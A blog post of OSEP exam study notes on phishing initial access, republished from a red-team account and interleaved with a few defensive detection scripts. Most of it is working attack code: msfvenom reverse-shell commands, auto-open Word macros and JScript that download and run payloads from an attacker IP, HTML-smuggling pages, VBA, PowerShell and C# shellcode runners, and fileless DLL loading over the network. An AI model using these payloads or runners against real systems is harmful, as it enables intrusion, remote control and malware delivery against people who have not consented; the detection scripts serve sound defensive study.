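OSEP | Phishing Attacks

admin, July 23, 2024, 10:01:15

For the note format and study method, see "The Road to OSEP | Opening".

This post covers part one, "phishing attack" techniques. The notes largely follow the course material, but the sections do not map one-to-one, because some content is easier to understand once merged.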

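This is not quite the phishing technique you might have in mind: strictly speaking, what the course material covers is the preparation work before phishing. The key points are summarized below:

1-Phishing techniques

Main content: attack approaches and methods for gaining system access through social engineering

Main methods: executing a payload to get a shell in two ways, VBA (Word macros) and JS (Windows Script Host)

1.1-Remote code execution payloads

Generate payloads with msf

List the available payloads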

msfvenom -l

1.1.1-Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

1.1.2-Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

1.1.3-Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

1.1.4-PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

1.1.5-ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

1.1.6-JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

1.1.7-WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

1.1.8-Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

1.1.9-Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

1.1.10-Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

1.1.11-Linux Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

1.1.12-Windows Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

1.1.13-Mac Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

1.2-Receiving the shell

Use MSF, with the payload parameters filled in, to receive and manage the shell

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

1.3-HTML smuggling

Direct download

<html>
    <body>
        <a href="/msfstaged.exe" download="msfstaged.exe">DownloadMe</a>
    </body>
</html>

Improved version

<html>
    <head>
        <title>html smuggling 1</title>
    </head>
    <body>
        <script>
            function base64ToArrayBuffer(base64){
                var binary_string = window.atob(base64);
                var len = binary_string.length;
                var bytes = new Uint8Array(len);
                for(var i = 0; i < len; i++){ bytes[i] = binary_string.charCodeAt(i); }
                return bytes.buffer;
            }

            var file = 'TVqQAAM...';
            var data = base64ToArrayBuffer(file);
            var blob = new Blob([data], {type: 'octet/stream'});
            var fileaName = 'msfstaged.exe';

            var a = document.createElement('a');
            document.body.appendChild(a);
            a.style = 'display: none';
            var url = window.URL.createObjectURL(blob);
            a.href = url;
            a.download = fileaName;
            a.click();
            window.URL.revokeObjectURL(url);
        </script>
    </body>
</html>

Further improvement

<!DOCTYPE html>
<html>
    <head>
        <title>html smuggling 2</title>
    </head>
    <body>
        <h1>Example 2</h1>
        <script>
            function base64ToArrayBuffer(base64){
                var binary_string = window.atob(base64);
                var len = binary_string.length;
                var bytes = new Uint8Array(len);
                for(var i = 0; i < len; i++){ bytes[i] = binary_string.charCodeAt(i); }
                return bytes.buffer;
            }

            var file = "TVqQAAMAAAAEAAA...";

            var data = base64ToArrayBuffer(file);
            var blob = new Blob([data], {type: 'octet/stream'});

            var filename = 'msfstaged.exe';
            navigator.msSaveBlob(blob, filename);
        </script>
    </body>
</html>
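From the defender's side, both smuggling pages above have the same static shape: a base64 string literal that decodes to an executable header, plus a call that hands the resulting Blob to the browser's save path. The following is an added example, not part of the original notes, that checks an HTML document for that shape without running any script; the function names and sample documents are constructed for illustration.

```python
import base64
import re

# Leading bytes of file types a mail or web gateway would normally block.
MAGIC = {b"MZ": "Windows PE", b"PK\x03\x04": "ZIP / OOXML",
         b"\xd0\xcf\x11\xe0": "OLE2 (legacy Office)", b"\x7fELF": "ELF"}
# Browser calls that hand an in-page Blob to the download machinery.
SINKS = ("createObjectURL", "msSaveBlob", "msSaveOrOpenBlob")
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)


def embedded_files(script):
    """Name the file type hidden in each base64 string literal, if any."""
    found = []
    for literal in B64_LITERAL.findall(script):
        head = base64.b64decode(literal[:16])  # 16 chars decode to the first 12 bytes
        found += [kind for magic, kind in MAGIC.items() if head.startswith(magic)]
    return found


def assess(html):
    """Static verdict for one HTML document; no script is executed."""
    script = "\n".join(SCRIPT.findall(html))
    files = embedded_files(script)
    sinks = [s for s in SINKS if s in script]
    return {
        "embedded": files,
        "sinks": sinks,
        "auto_click": bool(re.search(r"\.click\s*\(", script)),
        # A blocked file type decoded in the page and pushed to a save API.
        "suspicious": bool(files and sinks),
    }


# Constructed samples: the "files" are zero bytes behind a real signature.
FAKE_PE = base64.b64encode(b"MZ\x90\x00" + bytes(60)).decode()
FAKE_PNG = base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(40)).decode()
TEMPLATE = """<html><body><script>
var file = '%s';
var bytes = Uint8Array.from(window.atob(file), function (c) { return c.charCodeAt(0); });
var a = document.createElement('a');
a.href = window.URL.createObjectURL(new Blob([bytes], {type: 'octet/stream'}));
a.download = '%s';
a.click();
</script></body></html>"""
SAMPLES = {
    "smuggled_exe": TEMPLATE % (FAKE_PE, "msfstaged.exe"),
    "inline_image": TEMPLATE % (FAKE_PNG, "logo.png"),
    "direct_link": '<html><body><a href="/msfstaged.exe" download="msfstaged.exe">'
                   "DownloadMe</a></body></html>",
}

if __name__ == "__main__":
    for name, html in SAMPLES.items():
        print(name, assess(html))
```

The direct link is not flagged because the executable there still crosses the network as its own download, where a proxy can inspect it; a literal that is split or encoded some other way will not match and needs the page rendered in a sandbox instead.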

1.4-Office phishing

VB macro code

Sub MyMacro1()
    Dim myLong As Long
    myLong = 1
    If myLong < 5 Then
        MsgBox ("True")
    Else
        MsgBox ("False")
    End If
End Sub

Sub MyMacro2()
    Dim str As String
    str = "cmd.exe"
    Shell str, vbHide
End Sub

Sub Document_Open()
    MyMacro2
End Sub

Sub AutoOpen()
    MyMacro2
End Sub

Sub MyMacro3()
    Dim str As String
    str = "cmd.exe"
    Shell str, vbHide
End Sub

Sub MyMacro4()
    Dim str As String
    str = "cmd.exe"
    CreateObject("Wscript.Shell").Run str, 0
End Sub

Running PowerShell and delayed execution

Sub MyMacro3()
    Dim str As String
    str = "powershell IWR -uri http://192.168.203.214/msfstaged.exe -outfile msfstaged.exe"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide
End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

1.5-Using the Win32 API from VB

Generate the shellcode

msfvenom -p windows/meterpreter/reverse_https lhost=<IP> lport=<PORT> exitfunc=thread -f vbapplication

Mind the bitness of the shellcode (32-bit)

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

Sub myMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim data As Long

    buf = Array(...)
    ' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub
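For triage of extracted macro source, what matters in sections 1.4 and 1.5 is not that a `Shell` call or a `Declare` exists, but that one is reachable from an entry point Word runs on its own. The following is an added example, not part of the original notes, that walks the macro call graph from `Document_Open` / `AutoOpen`; `triage` and the sample sources are constructed for illustration, and the source text is assumed to have been extracted from the document already.

```python
import re

AUTO_EXEC = {"document_open", "autoopen"}  # Word entry points used in these notes
NATIVE_APIS = {"virtualalloc", "rtlmovememory", "createthread"}
PROC = re.compile(r"^[ \t]*(?:(?:Public|Private)[ \t]+)?(?:Sub|Function)[ \t]+(\w+)"
                  r".*?^[ \t]*End[ \t]+(?:Sub|Function)", re.S | re.M | re.I)
DECLARE = re.compile(r"^[ \t]*(?:(?:Public|Private)[ \t]+)?Declare[ \t]+(?:PtrSafe[ \t]+)?"
                     r"(?:Function|Sub)[ \t]+(\w+)[ \t]+Lib\b", re.M | re.I)


def triage(source):
    """Map each auto-exec entry point to the risky behaviour reachable from it."""
    declared = {name.lower() for name in DECLARE.findall(source)}
    procs = {m.group(1).lower(): m.group(0) for m in PROC.finditer(source)}

    def inspect(body):
        words = set(re.findall(r"\w+", body.lower()))
        found = set()
        if "shell" in words:                   # Shell statement or Wscript.Shell
            found.add("process launch")
        if words & NATIVE_APIS & declared:     # call into a Declare'd import
            found.add("native memory/thread API")
        return found, words & set(procs)

    findings = {}
    for entry in sorted(AUTO_EXEC & set(procs)):
        reached, seen, stack = set(), set(), [entry]
        while stack:                           # depth-first walk of the call graph
            name = stack.pop()
            if name not in seen:
                seen.add(name)
                found, callees = inspect(procs[name])
                reached |= found
                stack.extend(callees)
        findings[entry] = sorted(reached)
    return findings


# Constructed macro sources modelled on the patterns above; no payload bytes.
NATIVE_RUNNER = '''
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Sub Document_Open()
    MyMacro
End Sub
Sub MyMacro()
    addr = VirtualAlloc(0, 16, &H3000, &H40)
End Sub
'''
SHELL_RUNNER = '''
Sub AutoOpen()
    MyMacro2
End Sub
Sub MyMacro2()
    Shell "cmd.exe", vbHide
End Sub
'''
UNREACHED = '''
Sub Document_Open()
    ActiveDocument.Content.Font.Name = "Calibri"
End Sub
Sub Helper()
    Shell "notepad.exe", vbNormalFocus
End Sub
'''
```

An empty list for an entry point, as with `UNREACHED`, means the document auto-runs code but nothing risky is reachable from it by name; it does not clear the macro, since string-built calls are outside what this walk sees.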

1.6-Phishing Pretext

Code

Sub Document_Open()
    SubPage
End Sub

Sub AutoOpen()
    SubPage
End Sub

Sub SubPage()
    ActiveDocument.Content.Select
    Selection.Delete
    ActiveDocument.AttachedTemplate.AutoTextEntries("TheDoc").Insert Where:=Selection.Range, RichText:=True
End Sub

Calling the Win32 API through C# (from PowerShell), tested with MessageBox

$User32 = @"
using System;
using System.Runtime.InteropServices;

public class User32 {
    [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    public static extern int MessageBox(int hWnd, String text, String caption, uint type);
}
"@

Add-Type $User32

[User32]::MessageBox(0, "Test", "BoxTitle", 0)

Prepare the shellcode

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=443 EXITFUNC=thread -f ps1

Assemble the script

$Kernel32 = @"
using System;
using System.Runtime.InteropServices;

public class Kernel32 {
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32", CharSet = CharSet.Ansi)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@

Add-Type $Kernel32

[Byte[]] $buf = ...

$size = $buf.Length

[IntPtr]$addr = [Kernel32]::VirtualAlloc(0,$size, 0x3000,0x40);

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)

$thandle = [Kernel32]::CreateThread(0, 0, $addr, 0, 0, 0);

[Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

1.7-Dynamic invocation in PowerShell

[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname

Three steps:

 1 - Find GetModuleHandle
 2 - Load target dll
 3 - Invoke target function

1.7.1-GetProcAddress

# Load system.dll
$systemdll = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') })

# Locate all the unsafe methods
$unsafeObj = $systemdll.GetType('Microsoft.Win32.UnsafeNativeMethods')

# Find GetModuleHandle
$GetModuleHandle = $unsafeObj.GetMethod('GetModuleHandle')

# Use GetModuleHandle to get a handle to a dll, user32.dll
$GetModuleHandle.Invoke($null, @("user32.dll"))

# Find GetProcAddress
$GetProcAddress = $unsafeObj.GetMethod('GetProcAddress')

# We have two candidates, so we put them into a list and check each one.
$tmp=@()
$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}

# We just use the first one.
$GetProcAddress = $tmp[0]

$user32 = $GetModuleHandle.Invoke($null, @("user32.dll"))
$GetProcAddress.Invoke($null, @($user32, "MessageBoxA"))

Putting the code together

function LookupFunc {

    Param ($moduleName, $functionName)

    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}

    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))
}

$MessageBoxA = LookupFunc user32.dll MessageBoxA
$MessageBoxA

1.7.2-GetDelegateType

$MyAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')

# Get current domain
$Domain = [AppDomain]::CurrentDomain

# Define as DynamicAssembly, avoid saving to disk
# Provide Run argument, to set it as executable.
$MyAssemblyBuilder = $Domain.DefineDynamicAssembly($MyAssembly,[System.Reflection.Emit.AssemblyBuilderAccess]::Run)

# Create the content
# Create an InMemoryModule and do not include symbols
$MyModuleBuilder = $MyAssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)

# Use DefineType to define a delegateType
# class (so we can later instantiate it), public, non-extendable, and use ASCII instead of Unicode
$MyTypeBuilder = $MyModuleBuilder.DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

# Then put function prototype inside this DefineType
# param1: MethodAttributes, 'RTSpecialName, HideBySig, Public', make it public and require it to be referenced by both name and signature
# param2: Calling conventions, here use standard
# param3: arguments for MessageBoxA
$MyConstructorBuilder = $MyTypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, @([IntPtr], [String], [String], [int]))

# SetImplementationFlags, choose Runtime and Managed
$MyConstructorBuilder.SetImplementationFlags('Runtime, Managed')

# Then we want to invoke the function, we should define the settings for a function
# param1: choose Public to make it accessible, HideBySig to allow it to be called by both name and signature,
#         NewSlot, and Virtual to indicate that the method is virtual and ensure that it always gets a new slot in the vtable
# param2: return type for the function
# param3: array of argument types
$MyMethodBuilder = $MyTypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', [int], @([IntPtr],[String], [String], [int]))

# SetImplementationFlags for methods as well, choose Runtime and Managed
$MyMethodBuilder.SetImplementationFlags('Runtime, Managed')

# Finally Create type
$MyDelegateType = $MyTypeBuilder.CreateType()

$MyFunction = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MessageBoxA, $MyDelegateType)

$MyFunction.Invoke([IntPtr]::Zero,"Hello World","This is My MessageBox",0)

1.7.3-Putting the code together

function getDelegateType {
    Param(
        [Parameter(Position = 0, Mandatory = $true)] [Type[]] $func,
        [Parameter(Position = 1)][Type] $delType = [Void]
    )

    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])

    $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')

    $type.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')

    return $type.CreateType()
}

1.7.4-Final code

function LookupFunc {
    Param ($moduleName, $functionName)

    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress"){$tmp+=$_}}
    return $tmp[0].Invoke($null,@(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}

function getDelegateType {
    Param(
        [Parameter(Position = 0, Mandatory = $true)] [Type[]] $func,
        [Parameter(Position = 1)][Type] $delType = [Void]
    )

    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])

    $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')

    $type.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')

    return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr],[UInt32],[UInt32],[UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000,0x3000,0x40)

[Byte[]] $buf = ...
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)

$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

$hThread

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([IntPtr]))).Invoke($hThread, 0xFFFFFFFF)
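The reflection approach in 1.7 leaves no compiled artifact on disk, but the script text still reaches PowerShell script block logging (Event ID 4104), as does the in-memory assembly load shown later in 1.14. The following is an added example, not part of the original notes, that reassembles 4104 fragments, undoes simple string splitting, and grades each script block; the indicator groups, function names and log excerpts are constructed for illustration, and the events are assumed to be already parsed into dictionaries.

```python
import re
from collections import defaultdict

# Indicator groups drawn from the techniques in these notes; a group fires only
# when every term in it is present in the normalised script text.
GROUPS = {
    "reflective API lookup": ["microsoft.win32.unsafenativemethods", "getprocaddress", "getmodulehandle"],
    "runtime delegate": ["getdelegateforfunctionpointer"],
    "compiled P/Invoke": ["add-type", "dllimport"],
    "executable memory": ["virtualalloc", "createthread"],
    "in-memory assembly": ["downloaddata", "reflection.assembly]::load("],
}
RESOLVERS = {"reflective API lookup", "runtime delegate", "compiled P/Invoke"}


def normalise(text):
    text = text.replace("`", "")                      # Get`ProcAddress
    text = re.sub(r"""(['"])\s*\+\s*\1""", "", text)   # 'GetModule'+'Handle'
    return re.sub(r"\s+", " ", text).lower()


def reassemble(events):
    """Join Event ID 4104 fragments per ScriptBlockId, ordered by MessageNumber."""
    parts = defaultdict(dict)
    for e in events:
        parts[e["ScriptBlockId"]][e["MessageNumber"]] = e["ScriptBlockText"]
    return {sid: "".join(frags[n] for n in sorted(frags)) for sid, frags in parts.items()}


def classify(script):
    text = normalise(script)
    hits = [name for name, terms in GROUPS.items() if all(t in text for t in terms)]
    if "executable memory" in hits and RESOLVERS & set(hits):
        level = "high"      # native functions resolved and used to run code from memory
    elif "in-memory assembly" in hits:
        level = "medium"    # downloaded bytes loaded as an assembly without touching disk
    else:
        level = "low" if hits else "none"
    return level, hits


# Constructed log excerpts (trimmed, no payload); field names follow Event ID 4104.
EVENTS = [
    {"ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2, "ScriptBlockText":
     "FunctionPointer((LookupFunc kernel32.dll VirtualAlloc), $t); LookupFunc kernel32.dll CreateThread"},
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2, "ScriptBlockText":
     "$u = $s.GetType('Microsoft.Win32.UnsafeNativeMethods'); $u.GetMethod('GetModule'+'Handle'); "
     "$u.GetMethods() | ? Name -eq Get`ProcAddress; [Runtime.InteropServices.Marshal]::GetDelegateFor"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1, "ScriptBlockText":
     "$d = (New-Object Net.WebClient).DownloadData('http://192.0.2.10/ClassLibrary1.dll'); "
     "[System.Reflection.Assembly]::Load($d)"},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1, "ScriptBlockText":
     "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
]


def verdicts(events):
    return {sid: classify(text) for sid, text in reassemble(events).items()}
```

Block `a1` only reaches "high" after its two fragments are joined in order: the first fragment on its own grades "low", which is why matching per event rather than per script block misses scripts that the logger has split.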

1.8-Phishing with HTA

HTA code

<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>

1.9-Phishing with WSH

Several file formats need to be tested. Pay attention to which extensions have a default handler program configured, for example JSE.

1.10-Phishing with JS

Generate the payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.203.214 LPORT=9000 -f exe > met.exe

JS code

var url = "http://192.168.203.214/met.exe";
var Objects = WScript.CreateObject('MSXML2.XMLHTTP');
Objects.Open('GET', url, false);
Objects.Send();

if (Objects.Status == 200){
    var Stream = WScript.CreateObject('ADODB.Stream');

    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Objects.ResponseBody);
    Stream.Position = 0;

    Stream.SaveToFile("met.exe", 2);
    Stream.Close();
}

var r = new ActiveXObject("WScript.shell").Run("met.exe");

Double-click the file to run it; it can also be run from the command line

c:\windows\system32\mshta.exe xx.js

1.11-Converting a .NET binary into a JS file

Tool used:

https://github.com/tyranid/DotNetToJScript

DotNetToJScript command

DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js

1.12-Calling the Win32 API from .NET to get a reverse shell

MessageBox test

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace ConsoleApp1
{
    class Program
    {
        [DllImport("user32.dll", CharSet=CharSet.Auto)]
        public static extern int MessageBox(IntPtr hWnd, String text, String caption, int options);

        static void Main(string[] args)
        {
            MessageBox(IntPtr.Zero, "This is my text", "This is my caption", 0);
        }
    }
}

PInvoke

https://www.pinvoke.net/

Generate the shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.203.214 lport=9000 -f csharp

Code that runs the shellcode

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace ShellcodeRunner
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        static void Main(string[] args)
        {
            // Console.WriteLine("START!");
            byte[] buf = new byte[510] { ... };

            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)size, 0x3000, 0x40);
            Marshal.Copy(buf, 0, addr, size);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            // Console.WriteLine(hThread);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            // Console.WriteLine("END!");
        }
    }
}

WaitForSingleObject is used because, once the new thread has been created, the original main thread still has to be dealt with, so it is made to wait until the new thread finishes.

Put the code above into a JS file

DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o runner.js

1.13-Other methods-SharpShooter

Tool:

https://github.com/mdsecactivebreach/SharpShooter

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.203.214 lport=443 -f raw -o shell.txt
python2 SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile ./shell.txt --output test

1.14-Loading a DLL with PowerShell

Generate the shellcode

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.203.214 lport=443 -f csharp

Compile the DLL

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace ClassLibrary1
{
    public class Class1
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        public static void runner()
        {
            byte[] buf = new byte[510] {...};

            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)size, 0x3000, 0x40);
            Marshal.Copy(buf, 0, addr, size);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}

Load the DLL with PowerShell

(New-Object System.Net.WebClient).DownloadFile('http://<IP>/ClassLibrary1.dll','ClassLibrary1.dll')
$assem = [System.Reflection.Assembly]::LoadFile("c:\users\admin\ClassLibrary1.dll")
$class = $assem.getType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

Fileless DLL loading

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.43.140:9999/ClassLibrary1.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

Remote loading

$assem = [System.Reflection.Assembly]::LoadFile("\\192.168.203.128\share\ClassLibrary1.dll")
$class = $assem.getType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

2-Other tips

2.1-Setting up an SMB share

On Kali:

/etc/samba/smb.conf

[share]
path = /home/kali/OSEP/smbshare
browseable = yes
read only = no

Add a user and set the password

smbpasswd -a kali

Using impacket

smbserver.py share . -smb2support

2.2-Installing Visual Studio

After installation, test by compiling the following code

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace Hello_World
{
    internal class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Hello World");
        }
    }
}

2.3-Proxy

New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null

$keys = Get-ChildItem 'HKU:\'
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}

$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer

[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr")

$wc = new-object system.net.WebClient

$wc.DownloadString("http://192.168.119.120/run2.ps1")

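Stay disciplined and be the best version of yourself

Originally published on the WeChat official account 高级红队专家: OSEP | Phishing Attacks

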